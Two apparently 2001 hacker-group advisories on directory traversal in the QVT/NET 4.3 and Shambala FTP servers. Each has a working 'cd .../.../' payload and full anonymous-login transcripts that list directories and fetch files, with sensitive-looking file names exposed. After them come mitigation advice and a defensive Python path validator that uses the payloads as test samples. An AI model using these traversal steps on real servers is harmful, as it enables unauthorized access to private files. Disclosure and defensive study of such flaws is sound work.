======================================================================

	      QVT/NET 4.3 FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, see the files in
that path, and GET files remotely.

----------------------------=[Platforms]=--------------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:


C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG... ...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system       246928  Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system            0  Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system            0  Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system      3209110  Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system      6330449  Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system            0  Jan 18 17:44 norton
drwxrwxrwx 1 nobody system            0  Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system            0  Jan 19 12:04 plugins

.
.
.
.

-rwxrwxrwx 1 nobody system            0  May  4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system            0  May  4 16:51 XXXX
drwxrwxrwx 1 nobody system            0  May  8 13:17 teens
drwxrwxrwx 1 nobody system            0  May  8 13:18 tmp
-rwxrwxrwx 1 nobody system          168  May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.



C:\>type raza-alt3kx.txt

Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


C:\>


-------------------------------=[Patch]=---------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that holds no sensitive files.

-------------------------=[Affected Company]=----------------------------

Company:

http://www.qpc.com






======================================================================


	        Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x, you don't rule, dude!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory, see the files in
that path, and GET files remotely.

----------------------------=[Platforms]=------------------------------

Windows 9.x
Windows NT
Windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  d---------    owner    group          0   21-maj-01 17:50   1.xx.xx.xx
  ----------    owner    group        283   21-maj-01 17:55   index-_-1_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-2_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-3_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-4_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-5_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-6_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-7_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-8_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-9_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-10_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-11_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-12_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-13_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-14_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-15_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_-16_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_0.htm
  ----------    owner    group        283   21-maj-01 17:55   index-_0_0_-1.htm
  ----------    owner    group        283   21-maj-01 17:55   .htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-2.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-3.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-4.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-5.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-6.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-7.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-8.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-9.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-10.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_0_-12.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_0_-1_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_1_0_-11.htm
  ----------    owner    group        283   21-maj-01 18:08   index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group      15444   04-maj-01 14:26   SCAN.log
  ----------    owner    group     140340   04-maj-01 14:05   MAILS-PRESIDENCIA.txt
  ----------    owner    group     466944   18-sep-99 09:32   Shambala.exe
  ----------    owner    group       3564   21-maj-01 17:48   ST6UNST.LOG
  ----------    owner    group         31   21-maj-01 17:50   passwordsxxx.txt
  d---------    owner    group          0   21-maj-01 17:50   Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
  ----------    owner    group     246928   18-jan-01 13:10   N6Setup.exe
  d---------    owner    group          0   18-jan-01 15:39   Netscape 6
  d---------    owner    group          0   18-jan-01 14:50   Netscape 6 Setup
  ----------    owner    group    3209110   19-jan-01 10:51   getrgt.exe

.
.
.
.
.

  ----------    owner    group        168   21-maj-01 19:07   raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that holds no sensitive files.
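
On the server side, the fix for both the QVT/NET and the Shambala transcripts
above is to validate each CWD argument segment by segment instead of refusing
only "..". The sketch below is an added example, not code from either vendor:
naive_filter is an assumed reconstruction of a blacklist consistent with the
replies shown, and resolve_cwd, compare and SAMPLES are hypothetical names.

```python
# Added illustration; naive_filter and resolve_cwd are hypothetical names.
ILLEGAL = set(':*?"<>|')

def naive_filter(arg):
    """Assumed blacklist: refuse only a segment that is exactly '..'."""
    return ".." not in arg.replace("\\", "/").split("/")

def resolve_cwd(current, arg):
    """Return the new virtual directory under '/', or raise ValueError.

    The path is built from a list of validated names and is never handed
    to the OS for interpretation, so odd segments cannot be reinterpreted.
    """
    arg = arg.replace("\\", "/")
    stack = [] if arg.startswith("/") else [s for s in current.split("/") if s]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                raise ValueError("CWD would leave the FTP root")
            stack.pop()
            continue
        # Win32 strips trailing dots and spaces from names, so '...' or
        # 'pub. ' is never a real entry; accept well-formed names only.
        if (seg != seg.rstrip(". ") or ILLEGAL & set(seg)
                or any(ord(c) < 32 for c in seg)):
            raise ValueError("illegal path segment: %r" % seg)
        stack.append(seg)
    return "/" + "/".join(stack)

def compare(args, current="/"):
    """Run both checks over CWD arguments; returns (arg, naive_ok, result)."""
    rows = []
    for arg in args:
        try:
            result = resolve_cwd(current, arg)
        except ValueError as exc:
            result = "REJECTED: %s" % exc
        rows.append((arg, naive_filter(arg), result))
    return rows

# First three arguments are taken from the transcripts; the rest are constructed.
SAMPLES = ["..", ".../.../.../.../.../.../", "/.../.../", "pub/docs", "pub/../incoming"]

if __name__ == "__main__":
    for row in compare(SAMPLES):
        print(row)
```

The validated virtual path is then joined to the configured FTP root; the
directory permissions recommended above remain the second layer of defence.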


-------------------------=[Affected Company]=-------------------------

http://www.evolvable.com